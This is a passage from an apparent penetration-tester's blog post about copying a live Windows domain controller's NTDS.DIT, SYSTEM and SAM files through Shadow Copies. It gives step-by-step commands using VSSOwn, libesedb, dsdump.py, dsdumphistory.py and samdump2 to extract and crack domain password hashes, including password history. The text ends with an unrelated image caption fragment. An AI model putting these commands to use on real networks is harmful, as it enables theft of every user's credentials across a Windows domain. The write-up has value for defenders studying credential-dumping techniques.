malware on Windows systems, but Mark mentions during the talk how one can access protected system files through Shadow Copies as well.
this meant something bigger. Something huge. Was it now possible to dump the NTDS.DIT and SYSTEM hive files from a LIVE domain controller for offline hash dumping? I quickly promoted one of my 2008 Servers to a DC, psexec'd a meterpreter shell to it and took
a shot at the NTDS.DIT file with VSSOwn. The file copied out of the Shadow Copy without issue.
So it appears that Mark and I have uncovered some interesting stuff here. You can access anything that is supposed to be locked down and protected on a Windows system by accessing them through Shadow Copies. I can only imagine how we are going to begin seeing
this used in the wild and I'm interested to see what others come up with.
But wait a sec. I still don't have hashes. All I have is the SYSTEM hive and the NTDS.DIT file. What can we do with these? Well, up until recently, nothing for free. No one had built a free, open source tool for parsing NTDS.DIT files and decrypting the
1. Create a new Shadow Copy.
<code>cscript vssown.vbs /start (optional) cscript vssown.vbs /create</code>
2. Pull the following files from a shadow copy:
<code>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit . copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM . copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .</code>
3. Copy files to BT5R1.
2. Download tools from:
<a href="http://csababarta.com/downloads/ntds_dump_hash.zip">http://csababarta.com/downloads/ntds_dump_hash.zip</a>
3. Configure and Make the source code for libesedb from the extracted package.
<code>cd libesedb chmod +x configure ./configure && make</code>
4. Use esedbdumphash to extract the datatable from ntds.dit.
<code>cd esedbtools ./esedbdumphash ../../ntds.dit</code>
5a. Use dsdump.py to dump the hashes from the datatable using the bootkey from the SYSTEM hive.
<code>cd ../../creddump/ python ./dsdump.py ../SYSTEM ../libesedb/esedbtools/ntds.dit.export/datatable</code>
5b. Use bkhive and samdump2 to dump the hashes from the SAM file using the bootkey from the SYSTEM hive.
<code>bkhive SYSTEM key.txt samdump2 SAM key.txt</code>
6. Crack the hashes.
Beautiful right? But we're not done yet. Csaba also created a tool called dsdumphistory.py which dumps the PAST hashes of all the users as well. Now you can crack the historical passwords of users and identify patterns in their password history.
<code>python ./dsdumphistory.py ../system ../libesedb/esedbtools/ntds.dit.export/datatable</code>
So what exactly does this mean? No more dangerous LSSAS injection to dump domain hashes and no more drive mounting to access locked and protected system files. This is just plain awesome! Huge props to Csaba Barta for the tools and kick ass white paper,
![27. Remove Element(列表)题目代码[图]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)